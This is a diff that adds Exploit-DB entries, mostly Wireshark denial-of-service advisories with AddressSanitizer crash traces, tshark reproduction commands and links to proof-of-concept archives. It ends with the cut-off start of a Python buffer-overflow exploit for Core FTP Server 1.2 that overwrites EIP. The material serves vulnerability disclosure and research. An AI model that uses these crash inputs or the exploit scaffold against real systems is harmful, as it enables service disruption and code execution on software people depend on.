05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==5092==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip + diff --git a/platforms/multiple/dos/39483.txt b/platforms/multiple/dos/39483.txt new file mode 100755 index 000000000..8c073868c --- /dev/null +++ b/platforms/multiple/dos/39483.txt @@ -0,0 +1,74 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=654 + +The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198 +READ of size 4 at 0x7fd688698b10 thread T0 + #0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8 + #1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16 + #2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12 + #3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14 + #4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17 + #5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7 + #6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10 + #7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9 + #9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9 + #13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8 + #14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3 + #16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #17 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #19 0x515daf in main wireshark/tshark.c:2197:13 + +0x7fd688698b10 is located 48 bytes to the left of global variable '' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30 + '' is ascii string 'Average Signal to Noise Ratio' +0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48 +SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report +Shadow bytes around the buggy address: + 0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 + 0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 + 0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9 + 0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9 + 0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00 +=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9 + 0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01 + 0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9 + 0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00 + 0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9 + 0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==32475==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip + diff --git a/platforms/multiple/dos/39484.txt b/platforms/multiple/dos/39484.txt new file mode 100755 index 000000000..e1e9ca57c --- /dev/null +++ b/platforms/multiple/dos/39484.txt @@ -0,0 +1,141 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=648 + +The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8 +READ of size 8 at 0x000005676c18 thread T0 + #0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64 + #1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12 + #2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21 + #3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12 + #4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12 + #6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21 + #7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12 + #8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9 + #9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12 + #10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12 + #11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9 + #12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12 + #13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12 + #15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12 + #16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21 + #17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12 + #18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5 + #19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9 + #24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14 + #25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31 + #29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5 + #30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3 + #31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5 + #32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3 + #33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9 + #37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8 + #38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3 + #39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9 + #44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3 + #45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5 + #46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5 + #47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3 + #48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3 + #49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9 + #53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16 + #54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14 + #55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9 + #56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3 + #57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3 + #58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7 + #62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10 + #63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9 + #67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21 + #68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5 + #73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #82 0xadffde in dissect_record wireshark/epan/packet.c:501:3 + #83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #84 0x53c91b in process_packet wireshark/tshark.c:3728:5 + #85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11 + #86 0x52c1df in main wireshark/tshark.c:2197:13 + +0x000005676c18 is located 8 bytes to the left of global variable '' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15 + '' is ascii string 'queryWithPerm ' +0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32 +SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set +Shadow bytes around the buggy address: + 0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 + 0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 + 0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 + 0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00 +=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00 + 0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 + 0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 + 0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 + 0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==7855==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip + diff --git a/platforms/windows/local/39480.py b/platforms/windows/local/39480.py new file mode 100755 index 000000000..c9330a848 --- /dev/null +++ b/platforms/windows/local/39480.py @@ -0,0 +1,77 @@ +#-*- coding: utf-8 -*- +# +# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC +# Date: 2016-02-22 +# Author: INSECT.B +# Facebook : https://www.facebook.com/B.INSECT00 +# GitHub : binsect00 +# Blog : http://binsect00.tistory.com +# Vendor Homepage : http://www.coreftp.com/ +# Software Link: +# Version: 1.2 +# Tested on: Windows7 Professional SP1 En x86 +# CVE : N/A + +''' +[+] Type : Buffer overflow +[+] Detail : +[-] The vulnerability has the most typical Buffer overflow vulnerabilities. +[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More] +[-] 'Log filename(include path)' field is no limit to the length and does not check the length +[-] Insert string "A"*1500 and press Ok, OK +[-] crash info +(3bc.e28): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001 +eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +41414141 ?? ??? +''' +import struct + +junk = "A" * 312 +EIP = struct.pack("